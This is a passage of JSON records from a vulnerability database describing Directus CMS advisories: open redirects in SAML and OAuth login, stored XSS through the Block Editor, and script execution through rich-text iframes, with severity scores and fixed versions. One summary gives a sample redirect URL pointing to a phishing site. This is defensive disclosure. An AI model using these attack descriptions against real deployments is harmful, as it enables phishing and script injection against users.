"https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89", "reference_id": "GHSA-qqmv-5p3g-px89", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T16:23:08Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373399?format=api", "purl": "pkg:npm/directus@11.16.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1" } ], "aliases": [ "CVE-2026-35412", "GHSA-qqmv-5p3g-px89" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u5hw-p46t-jybc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212209?format=api", "vulnerability_id": "VCID-ua8h-tmak-hufd", "summary": "Duplicate Advisory: Improper access control in Directus", "references": [ { "reference_url": "https://directus.io", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", 
"scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://directus.io" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534", "reference_id": "CVE-2024-6534", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534" }, { "reference_url": "https://github.com/advisories/GHSA-q83v-hq3j-4pq3", "reference_id": "GHSA-q83v-hq3j-4pq3", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q83v-hq3j-4pq3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33132?format=api", "purl": "pkg:npm/directus@10.13.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": 
"VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.1" } ], "aliases": [ "GHSA-q83v-hq3j-4pq3" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ua8h-tmak-hufd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/83730?format=api", "vulnerability_id": "VCID-ufth-uy5w-87fe", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.14.0, an open redirect vulnerability exists in the Directus SAML authentication callback endpoint. During SAML authentication, the `RelayState` parameter is intended to preserve the user's original destination. However, while the login initiation flow validates redirect targets against allowed domains, this validation is not applied to the callback endpoint. 
This allows an attacker to craft a malicious authentication request that redirects users to an arbitrary external URL upon completion. The vulnerability is present in both the success and error handling paths of the callback. This vulnerability can be exploited without authentication. Version 11.14.0 contains a patch.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-22032", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14615", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14641", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14642", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14523", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-22032" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22032", "reference_id": "CVE-2026-22032", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22032" }, { "reference_url": "https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23", "reference_id": "dad9576ea9362905cc4de8028d3877caff36dc23", "reference_type": "", "scores": [ { 
"value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/" } ], "url": "https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23" }, { "reference_url": "https://github.com/advisories/GHSA-3573-4c68-g8cc", "reference_id": "GHSA-3573-4c68-g8cc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3573-4c68-g8cc" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc", "reference_id": "GHSA-3573-4c68-g8cc", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36567?format=api", "purl": "pkg:npm/directus@11.14.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { 
"vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.0" } ], "aliases": [ "CVE-2026-22032", "GHSA-3573-4c68-g8cc" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ufth-uy5w-87fe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/173457?format=api", "vulnerability_id": "VCID-uhj5-vc26-t3ga", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.7.0, unauthorized JavaScript (JS) can be executed by inserting an iframe into the rich text html interface that links to an uploaded HTML file that loads another uploaded JS file in its script tag. This satisfies the regular content security policy header, which in turn allows the file to run any arbitrary JS. This issue was resolved in version 9.7.0. 
As a workaround, disable the live embed in the what-you-see-is-what-you-get by adding `{ \"media_live_embeds\": false }` to the _Options Overrides_ option of the Rich Text HTML interface.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-24814", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0043", "scoring_system": "epss", "scoring_elements": "0.63069", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0043", "scoring_system": "epss", "scoring_elements": "0.63073", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0043", "scoring_system": "epss", "scoring_elements": "0.63061", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.0043", "scoring_system": "epss", "scoring_elements": "0.62959", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-24814" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/pull/12020", "reference_id": "12020", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/" } ], "url": "https://github.com/directus/directus/pull/12020" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24814", "reference_id": "CVE-2022-24814", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24814" }, { "reference_url": "https://github.com/advisories/GHSA-xmjj-3c76-5w84", "reference_id": "GHSA-xmjj-3c76-5w84", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xmjj-3c76-5w84" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84", "reference_id": "GHSA-xmjj-3c76-5w84", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v9.7.0", "reference_id": "v9.7.0", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v9.7.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/20019?format=api", "purl": "pkg:npm/directus@9.7.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": 
"VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-9t8b-59vc-kbea" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-bsua-aktm-1qfd" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eb1b-zvas-muey" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u121-7x5t-3fcg" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0" } ], "aliases": [ "CVE-2022-24814", "GHSA-xmjj-3c76-5w84" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uhj5-vc26-t3ga" }, { "url": 
"http://public2.vulnerablecode.io/api/vulnerabilities/39920?format=api", "vulnerability_id": "VCID-v2je-s9mk-e3h1", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. The authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL. There's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate directus site and be taken to a malicious site made to look like an error message \"Your password needs to be updated\" to phish out the current password. Users who log in via OAuth2 into Directus may be at risk. This issue has been addressed in version 10.10.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28239", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45892", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.4603", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.46044", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.46037", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28239" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], 
"url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203", "reference_id": "5477d7d61babd7ffc2f835d399bf79611b15b203", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/" } ], "url": "https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203" }, { "reference_url": "https://docs.directus.io/reference/authentication.html#login-using-sso-providers", "reference_id": "authentication.html#login-using-sso-providers", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/" } ], "url": "https://docs.directus.io/reference/authentication.html#login-using-sso-providers" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28239", "reference_id": "CVE-2024-28239", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28239" }, { "reference_url": "https://github.com/advisories/GHSA-fr3w-2p22-6w7p", "reference_id": "GHSA-fr3w-2p22-6w7p", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": 
"https://github.com/advisories/GHSA-fr3w-2p22-6w7p" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p", "reference_id": "GHSA-fr3w-2p22-6w7p", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/29718?format=api", "purl": "pkg:npm/directus@10.10.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pt9-wpk9-tfhj" }, { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": 
"VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0" } ], "aliases": [ "CVE-2024-28239", "GHSA-fr3w-2p22-6w7p" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v2je-s9mk-e3h1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90367?format=api", "vulnerability_id": "VCID-v6mk-ybv3-tyc8", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 11.13.0 that allows users with `upload files` and `edit item` permissions to inject malicious JavaScript through the Block Editor interface. Attackers can bypass Content Security Policy (CSP) restrictions by combining file uploads with iframe srcdoc attributes, resulting in persistent XSS execution. 
Version 11.13.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64747", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13864", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13895", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.1378", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13893", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64747" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64747", "reference_id": "CVE-2025-64747", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64747" }, { "reference_url": "https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e", "reference_id": "d23525317f0780f04aa1fe7a99171a358e43cb2e", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": 
"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/" } ], "url": "https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e" }, { "reference_url": "https://github.com/advisories/GHSA-vv2v-pw69-8crf", "reference_id": "GHSA-vv2v-pw69-8crf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vv2v-pw69-8crf" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf", "reference_id": "GHSA-vv2v-pw69-8crf", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/35193?format=api", "purl": "pkg:npm/directus@11.13.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { 